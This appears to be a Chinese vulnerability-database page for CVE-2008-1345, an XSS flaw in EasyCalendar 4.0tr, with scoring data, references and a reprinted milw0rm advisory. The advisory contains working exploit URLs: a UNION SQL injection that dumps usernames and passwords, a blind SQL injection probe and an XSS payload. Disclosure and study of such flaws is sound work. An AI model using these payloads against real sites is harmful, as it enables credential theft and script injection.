微慑信息网

CVE-2008-1345-漏洞详情

CVE-2008-1345
CVSS 4.3
发布时间 :2008-03-17 12:44:00
修订时间 :2008-09-05 17:37:29
NMCOE    

[原文]Cross-site scripting (XSS) vulnerability in plugins/calendar/calendar_backend.php in MyioSoft EasyCalendar 4.0tr and earlier allows remote attackers to inject arbitrary web script or HTML via the day parameter in a dayview action.


[CNNVD]EasyCalendar ‘calendar_backend.php’ 跨站脚本攻击漏洞(CNNVD-200803-238)

        MyioSoft EasyCalendar中的plugins/calendar/calendar_backend.php存在跨站脚本漏洞。远程攻击者通过一个dayview操作中的日参数来注入任意web参数,来注入任意脚本或HTML。


CVSS (基础分值)

CVSS分值: 4.3 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]


CWE (弱点类目)

CWE-79 [在Web页面生成时对输入的转义处理不恰当(跨站脚本)]


CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用


OVAL (用于检测的技术细节)

未找到相关OVAL定义


官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1345

(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1345

(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200803-238

(官方数据源) CNNVD


其它链接及资源

http://www.securityfocus.com/bid/28232


(UNKNOWN)  BID  28232
http://www.milw0rm.com/exploits/5246


(UNKNOWN)  MILW0RM  5246
http://secunia.com/advisories/29373


(VENDOR_ADVISORY)  SECUNIA  29373
http://xforce.iss.net/xforce/xfdb/41180


(UNKNOWN)  XF  easycalendar-calendarbackend-xss(41180)
http://www.securityfocus.com/archive/1/archive/1/489678/100/0/threaded


(UNKNOWN)  BUGTRAQ  20080317 EasyCalendar <= 4.0tr - Multiple Remote Vulnerabilities


漏洞信息

EasyCalendar ‘calendar_backend.php’ 跨站脚本攻击漏洞
中危 跨站脚本
2008-03-17 00:00:00 2008-09-05 00:00:00
远程  
        MyioSoft EasyCalendar中的plugins/calendar/calendar_backend.php存在跨站脚本漏洞。远程攻击者通过一个dayview操作中的日参数来注入任意web参数,来注入任意脚本或HTML。


公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:


        http://myiosoft.com/


漏洞信息 (5246)

EasyCalendar <= 4.0tr Multiple Remote Vulnerabilities (EDBID:5246)
php webapps
2008-03-12 Verified
0 JosS

N/A

[点击下载]

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+               EasyCalendar <= 4.0tr - Multiple Remote Vulnerabilities              +==--
--==+====================================================================================+==--
                     [+] [JosS] + [Spanish Hackers Team] + [Sys - Project]

[+] Info:

[~] Software: EsayCalendar
[~] HomePage: http://myiosoft.com
[~] Exploit: Multiple Remote Vulnerabilities [High]
[~] Bug Found By: JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[~] Verified in localhost with EsayCalendar 4.0tr and magic_quotes Off

[+] Remote SQL Injection:

[~] Vuln File: calendar_backend.php
[~] Exploit: http://localhost/PATH/plugins/calendar/calendar_backend.php?pageec=dayview&month=2&year=-1[SQL]
[~] Example: -1+union+all+select+1,2,3,concat(username,char(54),password),5,6,7,8,9,0,1+from+dbpfixajaxp_users/*

[+] Blind SQL Injection:

[~] Vuln File: ajaxp_backend.php
[~] Exploit: http://localhost/PATH/ajaxp_backend.php?page=[BLIND]
[~] Example: 1+and+1%3D0 

[+] Cross Site Scripting:

[~] Vuln File: calendar_backend.php
[~] Exploit: http://localhost/PATH/plugins/calendar/calendar_backend.php?pageec=dayview&day=[XSS]
[~] Example: >'>alert("JosS")%3B


--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+                                       JosS                                         +==--
--==+====================================================================================+==--
                                       [+] [The End]

# milw0rm.com [2008-03-12]
  


漏洞信息


42897
EasyCalendar calendar_backend.php day Parameter XSS

Remote / Network Access

Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Uncoordinated Disclosure


漏洞描述

EasyCalendar contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate 'day' variables upon submission to the 'calendar_back-end.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


时间线


2008-03-12

Unknow
2008-03-12 Unknow


解决方案

赞(0) 打赏
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » CVE-2008-1345-漏洞详情

评论 抢沙发

微慑信息网 专注工匠精神

微慑信息网-VulSee.com-关注前沿安全态势,聚合网络安全漏洞信息,分享安全文档案例

访问我们联系我们

觉得文章有用就打赏一下文章作者

非常感谢你的打赏,我们将继续提供更多优质内容,让我们一起创建更加美好的网络世界!

支付宝扫一扫打赏

微信扫一扫打赏

登录

找回密码

注册